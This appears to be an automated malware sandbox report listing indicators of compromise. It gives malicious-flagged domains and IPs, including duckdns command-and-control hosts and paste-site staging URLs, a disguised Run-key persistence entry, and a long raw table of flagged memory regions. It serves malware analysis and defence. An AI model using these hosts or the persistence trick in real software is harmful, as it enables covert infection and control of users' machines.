https://analytics.paste.ee;
unknown
https://paste.ee/d/9xfVr/0P
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
There are 35 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.96.3
 malicious
janbours92harbu04.duckdns.org
172.111.244.100
 malicious
desckvbrat.com.br
191.252.83.213
 malicious
simonastolerciuc.ro
85.120.16.93
 malicious
pastebin.com
172.67.19.24
 malicious
janbours92harbu03.duckdns.org
192.169.69.26
 malicious
janbours92harbu007.duckdns.org
unknown
 malicious
ftp.desckvbrat.com.br
unknown
 malicious

IPs

IP
Domain
Country
Malicious
85.120.16.93
simonastolerciuc.ro
Romania
malicious
172.67.19.24
pastebin.com
United States
malicious
172.111.244.100
janbours92harbu04.duckdns.org
United States
malicious
188.114.96.3
paste.ee
European Union
malicious
191.252.83.213
desckvbrat.com.br
Brazil
malicious
192.169.69.26
janbours92harbu03.duckdns.org
United States
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Update Drivers NVIDEO_ewz
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rmc-NACZDT
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-NACZDT
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-NACZDT
time
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
CC8000
heap
page read and write
 malicious
BD8000
heap
page read and write
 malicious
2A61F4F2000
trusted library allocation
page read and write
 malicious
20B6F6D1000
trusted library allocation
page read and write
 malicious
2AE00222000
trusted library allocation
page read and write
 malicious
FC8000
heap
page read and write
 malicious
28BF000
stack
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
20B6FAC2000
trusted library allocation
page read and write
 malicious
1425ED61000
trusted library allocation
page read and write
 malicious
7DF4924D0000
trusted library allocation
page execute and read and write
7FFD3467C000
trusted library allocation
page execute and read and write
1D741B9D000
trusted library allocation
page read and write
7FFD349E0000
trusted library allocation
page read and write
7FFD34880000
trusted library allocation
page read and write
1D203C20000
heap
page execute and read and write
2A6272F0000
heap
page read and write
20B5D600000
heap
page read and write
27402250000
heap
page read and write
7FFD34869000
trusted library allocation
page read and write
7FFD3477A000
trusted library allocation
page read and write
2A60F947000
trusted library allocation
page read and write
2940A4D8000
trusted library allocation
page read and write
1424C94F000
heap
page read and write
1A703DC1000
trusted library allocation
page read and write
940000
heap
page read and write
1D213C51000
trusted library allocation
page read and write
20B5D6D0000
heap
page read and write
14F88871000
heap
page read and write
2A60F2EF000
trusted library allocation
page read and write
7FFD345E0000
trusted library allocation
page read and write
2AE0194C000
trusted library allocation
page read and write
7FFD34890000
trusted library allocation
page read and write
1A70528B000
trusted library allocation
page read and write
20B5D670000
heap
page read and write
2940B04A000
trusted library allocation
page read and write
2940B062000
trusted library allocation
page read and write
7FFD34850000
trusted library allocation
page read and write
DC8F92E000
unkown
page read and write
14F88AC0000
heap
page read and write
1A703DB0000
heap
page execute and read and write
7FFD348F9000
trusted library allocation
page read and write
14F889F9000
heap
page read and write
8B085FC000
stack
page read and write
14F889D0000
heap
page read and write
7FFD34870000
trusted library allocation
page read and write
7FFD34790000
trusted library allocation
page execute and read and write
7FFD347D0000
trusted library allocation
page read and write
1A702032000
heap
page read and write
1D749F29000
heap
page read and write
7FFD34930000
trusted library allocation
page read and write
7FFD347F0000
trusted library allocation
page read and write
29422490000
heap
page execute and read and write
2A60ECC0000
trusted library allocation
page read and write
1D201F10000
heap
page read and write
29408540000
heap
page execute and read and write
1D731CA1000
trusted library allocation
page read and write
2940AF29000
trusted library allocation
page read and write
7FFD34870000
trusted library allocation
page read and write
10E28FB000
stack
page read and write
7FFD34830000
trusted library allocation
page read and write
D8ADA7C000
stack
page read and write
F5DE77B000
stack
page read and write
7FFD34890000
trusted library allocation
page read and write
2A6275C7000
heap
page read and write
7FFD34908000
trusted library allocation
page read and write
DC8FC7E000
stack
page read and write
2940AFAA000
trusted library allocation
page read and write
1D72FC60000
trusted library allocation
page read and write
1D733024000
trusted library allocation
page read and write
14F889D2000
heap
page read and write
DC90CCE000
stack
page read and write
7FFD345CD000
trusted library allocation
page execute and read and write
20B5FBA0000
trusted library allocation
page read and write
D8AD2FF000
stack
page read and write
29408400000
heap
page read and write
20B5F6B0000
heap
page execute and read and write
2940B029000
trusted library allocation
page read and write
14F889F1000
heap
page read and write
2AE0120E000
trusted library allocation
page read and write
14F88A13000
heap
page read and write
1424C98E000
heap
page read and write
14266C92000
heap
page read and write
2AE79651000
heap
page read and write
7FFD3490C000
trusted library allocation
page read and write
1425EB09000
trusted library allocation
page read and write
14F889D1000
heap
page read and write
1D749ED0000
heap
page read and write
F5DE6FE000
stack
page read and write
1D202000000
heap
page read and write
2A60F700000
trusted library allocation
page read and write
2940B04C000
trusted library allocation
page read and write
7FFD347B4000
trusted library allocation
page read and write
7FFD34930000
trusted library allocation
page read and write
14F88827000
heap
page read and write
7FFD347C0000
trusted library allocation
page read and write
2940B391000
trusted library allocation
page read and write
C1FBA78000
stack
page read and write
7FFD347F0000
trusted library allocation
page read and write
7FFD347A5000
trusted library allocation
page read and write
2940AE93000
trusted library allocation
page read and write
7FFD34782000
trusted library allocation
page read and write
7FFD347A2000
trusted library allocation
page read and write
1424E4D0000
heap
page read and write
14F88827000
heap
page read and write
1D204E27000
trusted library allocation
page read and write
7FFD345C3000
trusted library allocation
page execute and read and write
2A60D138000
heap
page read and write
7FFD3468C000
trusted library allocation
page execute and read and write
29422372000
heap
page read and write
1D21C357000
heap
page read and write
14F8694B000
heap
page read and write
7FFD345D4000
trusted library allocation
page read and write
20B5D8F0000
trusted library allocation
page read and write
14F88827000
heap
page read and write
14266CDE000
heap
page read and write
2720000
heap
page read and write
2940B3B5000
trusted library allocation
page read and write
7FFD347C0000
trusted library allocation
page read and write
C1FBAFB000
stack
page read and write
7FFD345CD000
trusted library allocation
page execute and read and write
1424F21B000
trusted library allocation
page read and write
DC901FC000
stack
page read and write
2AE79188000
heap
page read and write
2AE00D70000
trusted library allocation
page read and write
D8AE48E000
stack
page read and write
1D72FD40000
heap
page read and write
1D731E6B000
trusted library allocation
page read and write
7FFD349D0000
trusted library allocation
page execute and read and write
7FFD34910000
trusted library allocation
page read and write
2AE102F2000
trusted library allocation
page read and write
2940B054000
trusted library allocation
page read and write
1A702293000
trusted library allocation
page read and write
14F889F1000
heap
page read and write
7FFD347F0000
trusted library allocation
page read and write
1A7049F2000
trusted library allocation
page read and write
10E29FD000
stack
page read and write
2AE79984000
heap
page read and write
1A7057A4000
trusted library allocation
page read and write
2A60F260000
heap
page execute and read and write
8B082FD000
stack
page read and write
44B66FE000
stack
page read and write
7FFD34780000
trusted library allocation
page execute and read and write
2940A7AF000
trusted library allocation
page read and write
DC90E4E000
stack
page read and write
1D731740000
heap
page execute and read and write
14F887E1000
heap
page read and write
7FFD3475A000
trusted library allocation
page read and write
2942242C000
heap
page read and write
1A7021F0000
heap
page read and write
294083A0000
heap
page read and write
14F887C0000
heap
page read and write
14F86951000
heap
page read and write
7FFD349E0000
trusted library allocation
page read and write
1D204CB2000
trusted library allocation
page read and write
1D733036000
trusted library allocation
page read and write
7FFD34890000
trusted library allocation
page read and write
7FFD34670000
trusted library allocation
page read and write
1D73338C000
trusted library allocation
page read and write
2A60F49C000
trusted library allocation
page read and write
14266B70000
heap
page read and write
7FFD347C0000
trusted library allocation
page read and write
9A33EBF000
unkown
page read and write
10E2AF7000
stack
page read and write
7FFD346C0000
trusted library allocation
page execute and read and write
1D2054B8000
trusted library allocation
page read and write
2940B030000
trusted library allocation
page read and write
7FFD34676000
trusted library allocation
page read and write
7FFD34830000
trusted library allocation
page read and write
2A60F726000
trusted library allocation
page read and write
2940AF39000
trusted library allocation
page read and write
D8AD6F9000
stack
page read and write
2940AA0B000
trusted library allocation
page read and write
2A60D3C0000
heap
page read and write
1D731CBB000
trusted library allocation
page read and write
7FFD34780000
trusted library allocation
page execute and read and write
1D72FBCC000
heap
page read and write
14F88A1E000
heap
page read and write
29422436000
heap
page read and write
2AE012A1000
trusted library allocation
page read and write
9A33FFE000
stack
page read and write
7FFD348C0000
trusted library allocation
page read and write
7FFD34742000
trusted library allocation
page read and write
A987A7E000
stack
page read and write
2A60F718000
trusted library allocation
page read and write
1A7056B3000
trusted library allocation
page read and write
7FFD348A0000
trusted library allocation
page read and write
9A3407D000
stack
page read and write
8B0867E000
stack
page read and write
2AE777B0000
heap
page read and write
C1FB6FE000
stack
page read and write
294225D3000
heap
page read and write
2940AFC0000
trusted library allocation
page read and write
2940AFF7000
trusted library allocation
page read and write
D8AD272000
stack
page read and write
1A703C93000
heap
page read and write
2A60D164000
heap
page read and write
C1FC7CD000
stack
page read and write
7FFD34930000
trusted library allocation
page read and write
1D21C3F2000
heap
page read and write
14F86B10000
heap
page read and write
F5DE8FD000
stack
page read and write
F5DE979000
stack
page read and write
44B65FD000
stack
page read and write
7FFD348D0000
trusted library allocation
page read and write
20B77930000
heap
page read and write
9B207FF000
unkown
page read and write
1A705293000
trusted library allocation
page read and write
7FFD34740000
trusted library allocation
page read and write
7FFD345A4000
trusted library allocation
page read and write
1D749EFF000
heap
page read and write
2940845A000
heap
page read and write
2AE79742000
heap
page read and write
7FFD34870000
trusted library allocation
page read and write
7FFD34751000
trusted library allocation
page read and write
14F86CAE000
heap
page read and write
2940A75B000
trusted library allocation
page read and write
14F88829000
heap
page read and write
294223AD000
heap
page read and write
7FFD348D0000
trusted library allocation
page read and write
1D213F3D000
trusted library allocation
page read and write
20B5F8F3000
trusted library allocation
page read and write
1A703CBC000
heap
page read and write
7FFD345D0000
trusted library allocation
page read and write
478000
remote allocation
page execute and read and write
1D72FB4A000
heap
page read and write
14266C9D000
heap
page read and write
14F88B47000
heap
page read and write
1D202140000
heap
page execute and read and write
2940AE3B000
trusted library allocation
page read and write
7FFD347FD000
trusted library allocation
page read and write
20B5F1F0000
heap
page read and write
7FFD34929000
trusted library allocation
page read and write
294223BF000
heap
page read and write
2940AF80000
trusted library allocation
page read and write
7FFD3462C000
trusted library allocation
page execute and read and write
2940A371000
trusted library allocation
page read and write
1A702010000
heap
page read and write
2AE1030C000
trusted library allocation
page read and write
2AE7761B000
heap
page read and write
14F88803000
heap
page read and write
14F888A7000
heap
page read and write
7DF4CFD40000
trusted library allocation
page execute and read and write
2A60F7A1000
trusted library allocation
page read and write
7FFD34780000
trusted library allocation
page execute and read and write
1D72FBF7000
heap
page read and write
20B5FF92000
trusted library allocation
page read and write
29408340000
heap
page read and write
29422570000
heap
page read and write
7FFD3477A000
trusted library allocation
page read and write
7FFD34A20000
trusted library allocation
page read and write
1A702060000
heap
page read and write
D8AD57B000
stack
page read and write
8B0847F000
stack
page read and write
29422770000
heap
page read and write
1D20411E000
trusted library allocation
page read and write
1424C820000
heap
page read and write
DC902FC000
stack
page read and write
1425EAF1000
trusted library allocation
page read and write
2A62736A000
heap
page read and write
1D2021F0000
heap
page read and write
A988A4E000
stack
page read and write
7FFD347B8000
trusted library allocation
page read and write
1D731E02000
trusted library allocation
page read and write
2A627575000
heap
page read and write
1D72FBC6000
heap
page read and write
28FB000
stack
page read and write
1424EF9A000
trusted library allocation
page read and write
27402430000
heap
page read and write
1D201F70000
heap
page read and write
7FFD345A2000
trusted library allocation
page read and write
7FFD346E0000
trusted library allocation
page execute and read and write
7FFD34840000
trusted library allocation
page read and write
2AE102ED000
trusted library allocation
page read and write
10E297E000
stack
page read and write
2A60D143000
heap
page read and write
D8AD5FE000
stack
page read and write
1424EA08000
heap
page read and write
DC8FE7D000
stack
page read and write
2AE00DB4000
trusted library allocation
page read and write
1D733388000
trusted library allocation
page read and write
14F887A1000
heap
page read and write
1A713E41000
trusted library allocation
page read and write
1D21C3EE000
heap
page read and write
7FFD34810000
trusted library allocation
page read and write
1D7317A0000
heap
page read and write
29422578000
heap
page read and write
7FFD347E9000
trusted library allocation
page read and write
2AE77870000
trusted library allocation
page read and write
7FFD34810000
trusted library allocation
page read and write
7FFD34920000
trusted library allocation
page read and write
29408411000
heap
page read and write
7FFD34920000
trusted library allocation
page read and write
7FFD34820000
trusted library allocation
page read and write
7FFD34760000
trusted library allocation
page read and write
2940A695000
trusted library allocation
page read and write
1D749F72000
heap
page read and write
BD0000
heap
page read and write
2AE00BEB000
trusted library allocation
page read and write
BC6000
heap
page read and write
7FFD345A0000
trusted library allocation
page read and write
7FFD3488C000
trusted library allocation
page read and write
7FFD34850000
trusted library allocation
page read and write
EFC000
stack
page read and write
2940AF27000
trusted library allocation
page read and write
1D213CC4000
trusted library allocation
page read and write
2940AFC6000
trusted library allocation
page read and write
1425EB80000
trusted library allocation
page read and write
1D21C3A7000
heap
page read and write
20B5D920000
trusted library allocation
page read and write
2AE798DE000
heap
page read and write
7DF479AA0000
trusted library allocation
page execute and read and write
1424E980000
heap
page read and write
2AE01DD9000
trusted library allocation
page read and write
14F86910000
heap
page read and write
7FFD34830000
trusted library allocation
page read and write
1D2039A7000
heap
page read and write
471000
remote allocation
page execute and read and write
7FFD34780000
trusted library allocation
page execute and read and write
10E287E000
stack
page read and write
2940ABCE000
trusted library allocation
page read and write
2A60ECB0000
heap
page readonly
184B3584000
heap
page read and write
10E380E000
stack
page read and write
7FFD348F0000
trusted library allocation
page read and write
2AE0177F000
trusted library allocation
page read and write
2940B36C000
trusted library allocation
page read and write
1424C91D000
heap
page read and write
DC9017F000
stack
page read and write
2940B043000
trusted library allocation
page read and write
7FFD345C0000
trusted library allocation
page read and write
7FFD345F0000
trusted library allocation
page read and write
F5DE3EE000
stack
page read and write
1425EAE1000
trusted library allocation
page read and write
1D7335CD000
trusted library allocation
page read and write
2940A7BC000
trusted library allocation
page read and write
1D741D74000
trusted library allocation
page read and write
2940AF3D000
trusted library allocation
page read and write
7FFD347A0000
trusted library allocation
page read and write
BFE000
stack
page read and write
2940AFB7000
trusted library allocation
page read and write
7FFD34800000
trusted library allocation
page read and write
1A702020000
heap
page read and write
1424E950000
heap
page execute and read and write
2A60F98B000
trusted library allocation
page read and write
7FFD34680000
trusted library allocation
page execute and read and write
1A705936000
trusted library allocation
page read and write
7FFD34820000
trusted library allocation
page read and write
7FFD34990000
trusted library allocation
page read and write
1424ED0C000
trusted library allocation
page read and write
7FFD348F4000
trusted library allocation
page read and write
1D731797000
heap
page execute and read and write
7FFD348C0000
trusted library allocation
page read and write
14F88A34000
heap
page read and write
7FFD345CD000
trusted library allocation
page execute and read and write
7FFD34800000
trusted library allocation
page read and write
1A713DC1000
trusted library allocation
page read and write
7FFD3488E000
trusted library allocation
page read and write
1D72FD15000
heap
page read and write
7FFD34900000
trusted library allocation
page read and write
1A702240000
trusted library allocation
page read and write
1A705658000
trusted library allocation
page read and write
2AE7996F000
heap
page read and write
7FFD346A6000
trusted library allocation
page execute and read and write
7FFD348E0000
trusted library allocation
page read and write
AF0000
heap
page read and write
1D7316A0000
heap
page read and write
7FFD34A00000
trusted library allocation
page read and write
14F88D5C000
heap
page read and write
1A7022D0000
trusted library allocation
page read and write
7FFD348A0000
trusted library allocation
page read and write
1D204BB0000
trusted library allocation
page read and write
7FFD348F0000
trusted library allocation
page read and write
14F88827000
heap
page read and write
29408520000
heap
page readonly
EBF000
stack
page read and write
1424C951000
heap
page read and write
14F887A3000
heap
page read and write
2A60D180000
heap
page read and write
29409DCB000
heap
page read and write
474000
remote allocation
page execute and read and write
29422361000
heap
page read and write
1D749E50000
trusted library section
page read and write
2AE775F4000
heap
page read and write
20B5F230000
heap
page read and write
1D741BAC000
trusted library allocation
page read and write
7FFD34680000
trusted library allocation
page execute and read and write
2940B00C000
trusted library allocation
page read and write
2A6274E0000
heap
page execute and read and write
10E2B7D000
stack
page read and write
1D21C2D0000
heap
page read and write
1D73192E000
trusted library allocation
page read and write
2940A3A2000
trusted library allocation
page read and write
7FFD3475A000
trusted library allocation
page read and write
7FFD34670000
trusted library allocation
page read and write
A987CFE000
stack
page read and write
14F88828000
heap
page read and write
20B6F760000
trusted library allocation
page read and write
1A71C2E8000
heap
page read and write
7FFD34880000
trusted library allocation
page read and write
1424EA5C000
heap
page read and write
1A703E3D000
trusted library allocation
page read and write
2A60F271000
trusted library allocation
page read and write
2A60D2C0000
heap
page read and write
2AE00A52000
trusted library allocation
page read and write
1D203B59000
heap
page read and write
2940B387000
trusted library allocation
page read and write
14F8883D000
heap
page read and write
2940AF51000
trusted library allocation
page read and write
184B35C0000
heap
page read and write
2940A9E1000
trusted library allocation
page read and write
29422432000
heap
page read and write
2940AFF3000
trusted library allocation
page read and write
7FFD34790000
trusted library allocation
page execute and read and write
2740233A000
heap
page read and write
7FFD34A10000
trusted library allocation
page read and write
7FFD348F0000
trusted library allocation
page read and write
D8AD9FE000
stack
page read and write
1D731CAC000
trusted library allocation
page read and write
F5DE3AF000
stack
page read and write
2AE013BD000
trusted library allocation
page read and write
F5DEB7E000
stack
page read and write
294085F0000
heap
page read and write
1A70206A000
heap
page read and write
7FFD348C0000
trusted library allocation
page read and write
2940A486000
trusted library allocation
page read and write
7FFD34A30000
trusted library allocation
page read and write
1424F00F000
trusted library allocation
page read and write
8B07F2E000
stack
page read and write
10E2CFE000
stack
page read and write
2A60D1A7000
heap
page read and write
7FFD348A0000
trusted library allocation
page read and write
7FFD345A3000
trusted library allocation
page execute and read and write
7FFD34870000
trusted library allocation
page read and write
1D72FB8A000
heap
page read and write
7FFD34890000
trusted library allocation
page read and write
7FFD34670000
trusted library allocation
page read and write
20B77A10000
heap
page read and write
1A701F90000
heap
page read and write
2A627270000
heap
page read and write
2AE77613000
heap
page read and write
14F887D1000
heap
page read and write
2940A497000
trusted library allocation
page read and write
7FFD347E0000
trusted library allocation
page read and write
2940AE11000
trusted library allocation
page read and write
7FFD34820000
trusted library allocation
page read and write
20B77A49000
heap
page read and write
7FFD346B6000
trusted library allocation
page execute and read and write
14F88A39000
heap
page read and write
184B3790000
heap
page read and write
14F88C16000
heap
page read and write
1A705A00000
trusted library allocation
page read and write
2940A489000
trusted library allocation
page read and write
1D7418C0000
trusted library allocation
page read and write
7FFD347D0000
trusted library allocation
page read and write
14F88A28000
heap
page read and write
14F86CAC000
heap
page read and write
1424E355000
heap
page read and write
A9879F9000
stack
page read and write
1D741A8C000
trusted library allocation
page read and write
1D731790000
heap
page execute and read and write
1A702117000
heap
page read and write
1D7317E4000
heap
page read and write
10E23EE000
stack
page read and write
14F88D5C000
heap
page read and write
7FFD34771000
trusted library allocation
page read and write
1D21C3A9000
heap
page read and write
1D213C81000
trusted library allocation
page read and write
1D733008000
trusted library allocation
page read and write
294083D0000
heap
page read and write
7FFD34810000
trusted library allocation
page read and write
7FFD34770000
trusted library allocation
page execute and read and write
A987AF6000
stack
page read and write
2940AF37000
trusted library allocation
page read and write
14F8695F000
heap
page read and write
2A60F74E000
trusted library allocation
page read and write
7FFD34A1D000
trusted library allocation
page read and write
7DF4924F0000
trusted library allocation
page execute and read and write
14F88895000
heap
page read and write
7FFD346C0000
trusted library allocation
page execute and read and write
2A627560000
heap
page read and write
2AE0007E000
trusted library allocation
page read and write
44B67FF000
stack
page read and write
20B5D7BF000
heap
page read and write
29408360000
heap
page read and write
20B77A31000
heap
page read and write
7FFD345B0000
trusted library allocation
page read and write
7FFD34840000
trusted library allocation
page read and write
29422369000
heap
page read and write
A987FFB000
stack
page read and write
7FFD34820000
trusted library allocation
page read and write
7FFD34680000
trusted library allocation
page execute and read and write
1D731822000
heap
page read and write
10E26FF000
stack
page read and write
2AE777F0000
trusted library allocation
page read and write
2AE00D79000
trusted library allocation
page read and write
20B6F8E1000
trusted library allocation
page read and write
14F869E6000
heap
page read and write
1424EA0A000
heap
page read and write
1A70205D000
heap
page read and write
A9889CE000
stack
page read and write
14F88A28000
heap
page read and write
7FFD34870000
trusted library allocation
page read and write
1D203C51000
trusted library allocation
page read and write
2940842D000
heap
page read and write
B3E000
stack
page read and write
29422340000
heap
page read and write
7FFD347B0000
trusted library allocation
page execute and read and write
7FFD348A0000
trusted library allocation
page read and write
7FFD345A3000
trusted library allocation
page execute and read and write
1D203C40000
heap
page read and write
7FFD34890000
trusted library allocation
page read and write
1424F5E6000
trusted library allocation
page read and write
14F88827000
heap
page read and write
2941A3BE000
trusted library allocation
page read and write
1A7020AC000
heap
page read and write
14F86CA8000
heap
page read and write
10E2BF8000
stack
page read and write
2940AE6C000
trusted library allocation
page read and write
1424F1B5000
trusted library allocation
page read and write
14F887A0000
heap
page read and write
14F86CA5000
heap
page read and write
7FFD348A0000
trusted library allocation
page read and write
2940A341000
trusted library allocation
page read and write
14F88A28000
heap
page read and write
2940B064000
trusted library allocation
page read and write
2AE01005000
trusted library allocation
page read and write
14F88827000
heap
page read and write
1D7328F6000
trusted library allocation
page read and write
7FFD347B2000
trusted library allocation
page read and write
2940A7F5000
trusted library allocation
page read and write
7FFD34880000
trusted library allocation
page read and write
7FFD348E0000
trusted library allocation
page read and write
7FFD34680000
trusted library allocation
page read and write
7FFD345B0000
trusted library allocation
page read and write
1D72FC90000
heap
page readonly
1D202049000
heap
page read and write
7FFD34810000
trusted library allocation
page read and write
2A6275AF000
heap
page read and write
2940AFCF000
trusted library allocation
page read and write
2AE776CA000
heap
page read and write
1D749F1A000
heap
page read and write
7FFD34760000
trusted library allocation
page execute and read and write
2A60F060000
trusted library allocation
page read and write
7FFD34940000
trusted library allocation
page read and write
20B776C0000
heap
page read and write
7FFD34676000
trusted library allocation
page read and write
1D731EC6000
trusted library allocation
page read and write
7FFD34670000
trusted library allocation
page read and write
2AE79820000
heap
page execute and read and write
7FFD34800000
trusted library allocation
page read and write
7FFD34A10000
trusted library allocation
page read and write
C1FB77C000
stack
page read and write
1A703D4B000
heap
page read and write
14F887F1000
heap
page read and write
1424EAD0000
heap
page execute and read and write
7FFD34785000
trusted library allocation
page read and write
7FFD345D0000
trusted library allocation
page read and write
1424E480000
trusted library allocation
page read and write
7FFD34680000
trusted library allocation
page execute and read and write
7FFD34830000
trusted library allocation
page read and write
7FFD34860000
trusted library allocation
page read and write
1D7335D1000
trusted library allocation
page read and write
14F86952000
heap
page read and write
2AE799C7000
heap
page read and write
20B5FDA2000
trusted library allocation
page read and write
7FFD34680000
trusted library allocation
page execute and read and write
7FFD34820000
trusted library allocation
page read and write
1D733507000
trusted library allocation
page read and write
1D201F30000
heap
page read and write
7FFD34860000
trusted library allocation
page read and write
2940AFFA000
trusted library allocation
page read and write
1D20500F000
trusted library allocation
page read and write
7FFD34A20000
trusted library allocation
page read and write
2940AEC7000
trusted library allocation
page read and write
2AE01DFE000
trusted library allocation
page read and write
1A70207D000
heap
page read and write
7FFD34938000
trusted library allocation
page read and write
7FFD346A6000
trusted library allocation
page execute and read and write
7FFD349A0000
trusted library allocation
page read and write
2AE77864000
heap
page read and write
1D201E30000
heap
page read and write
2940B05B000
trusted library allocation
page read and write
1424F006000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
7DF4924E0000
trusted library allocation
page execute and read and write
2940B048000
trusted library allocation
page read and write
1D749EF9000
heap
page read and write
D8AD67D000
stack
page read and write
2940AEDB000
trusted library allocation
page read and write
20B7772A000
heap
page read and write
7FFD345DB000
trusted library allocation
page read and write
7FFD34650000
trusted library allocation
page read and write
2940B009000
trusted library allocation
page read and write
1425EB60000
trusted library allocation
page read and write
10E23A5000
stack
page read and write
14F889E7000
heap
page read and write
C1FBC7E000
stack
page read and write
2940B000000
trusted library allocation
page read and write
29422960000
heap
page read and write
2AE0133B000
trusted library allocation
page read and write
273F000
stack
page read and write
2A627550000
heap
page execute and read and write
14F88827000
heap
page read and write
14F86952000
heap
page read and write
1D731EA3000
trusted library allocation
page read and write
2A627400000
heap
page read and write
2AE10074000
trusted library allocation
page read and write
7FFD345C3000
trusted library allocation
page execute and read and write
14F86AF0000
heap
page read and write
9A340FE000
stack
page read and write
1D202012000
heap
page read and write
2940A7C9000
trusted library allocation
page read and write
20B5D7BA000
heap
page read and write
1D202180000
trusted library allocation
page read and write
2940AF12000
trusted library allocation
page read and write
2A60D300000
heap
page read and write
2940A60E000
trusted library allocation
page read and write
1A713E35000
trusted library allocation
page read and write
2AE77617000
heap
page read and write
2940ADC5000
trusted library allocation
page read and write
14F887F9000
heap
page read and write
7FFD34932000
trusted library allocation
page read and write
C1FB8FE000
stack
page read and write
294223C1000
heap
page read and write
1424EAE1000
trusted library allocation
page read and write
1D7318A0000
heap
page execute and read and write
D8AD7F9000
stack
page read and write
1424CB05000
heap
page read and write
2A61F492000
trusted library allocation
page read and write
1A71C2EE000
heap
page read and write
D8AD8FE000
stack
page read and write
44B63FF000
stack
page read and write
2A60D0B8000
heap
page read and write
2A60FB34000
trusted library allocation
page read and write
20B5D940000
trusted library allocation
page read and write
1D204EF3000
trusted library allocation
page read and write
29422420000
heap
page read and write
2940A47D000
trusted library allocation
page read and write
1A7022EE000
heap
page read and write
1424C840000
heap
page read and write
1A703C70000
heap
page read and write
2942243C000
heap
page read and write
A987DFE000
stack
page read and write
8FC000
stack
page read and write
1D72F9E0000
heap
page read and write
2940A40D000
trusted library allocation
page read and write
14F88A02000
heap
page read and write
14F86A00000
heap
page read and write
2AE77904000
heap
page read and write
1424C98B000
heap
page read and write
7FFD348A0000
trusted library allocation
page read and write
2AE77652000
heap
page read and write
1424CA60000
heap
page read and write
1424E440000
trusted library allocation
page read and write
1D72FCD2000
trusted library allocation
page read and write
14266CA0000
heap
page read and write
1D7317E2000
heap
page read and write
7FFD348D0000
trusted library allocation
page read and write
27402170000
heap
page read and write
7FFD348B0000
trusted library allocation
page read and write
1D72FC80000
trusted library allocation
page read and write
2A61F2E5000
trusted library allocation
page read and write
7FFD34924000
trusted library allocation
page read and write
29408454000
heap
page read and write
2940B012000
trusted library allocation
page read and write
DC90DCC000
stack
page read and write
7FFD346A6000
trusted library allocation
page execute and read and write
1D731E42000
trusted library allocation
page read and write
A987EFC000
stack
page read and write
7FFD345CD000
trusted library allocation
page execute and read and write
1D72FB40000
heap
page read and write
20B5D610000
heap
page read and write
294083DC000
heap
page read and write
2AE7989B000
heap
page read and write
7FFD3467C000
trusted library allocation
page execute and read and write
14F88854000
heap
page read and write
2AE10021000
trusted library allocation
page read and write
20B5F73B000
trusted library allocation
page read and write
7FFD347A5000
trusted library allocation
page read and write
2940AF61000
trusted library allocation
page read and write
1D21C020000
heap
page read and write
7FFD347F0000
trusted library allocation
page read and write
1A703C10000
heap
page read and write
14F889C1000
heap
page read and write
2A60D146000
heap
page read and write
1424F3E5000
trusted library allocation
page read and write
20B601EB000
trusted library allocation
page read and write
1D20205D000
heap
page read and write
1424EF96000
trusted library allocation
page read and write
1D72FD10000
heap
page read and write
14F889EC000
heap
page read and write
F5DE67E000
stack
page read and write
7FFD34830000
trusted library allocation
page read and write
B2C000
stack
page read and write
2AE79850000
heap
page read and write
1D731E67000
trusted library allocation
page read and write
44B5FFE000
stack
page read and write
1A703A9B000
heap
page read and write
29408419000
heap
page read and write
2940B046000
trusted library allocation
page read and write
1D204BB6000
trusted library allocation
page read and write
2AE77810000
trusted library allocation
page read and write
7FFD345D3000
trusted library allocation
page execute and read and write
337F000
stack
page read and write
A988B4C000
stack
page read and write
2940A4D1000
trusted library allocation
page read and write
7FFD348E0000
trusted library allocation
page read and write
7FFD346E0000
trusted library allocation
page execute and read and write
7FFD34880000
trusted library allocation
page read and write
2940849C000
heap
page read and write
1424C947000
heap
page read and write
1D731ECB000
trusted library allocation
page read and write
7FFD34660000
trusted library allocation
page execute and read and write
7FFD34840000
trusted library allocation
page read and write
1424E400000
heap
page readonly
BC0000
heap
page read and write
1D203AC0000
heap
page read and write
7FFD348E0000
trusted library allocation
page read and write
7FFD347E0000
trusted library allocation
page read and write
7FFD34880000
trusted library allocation
page read and write
C1FBBFE000
stack
page read and write
20B77850000
trusted library section
page read and write
2A6273E0000
heap
page read and write
2940AFE1000
trusted library allocation
page read and write
A987D79000
stack
page read and write
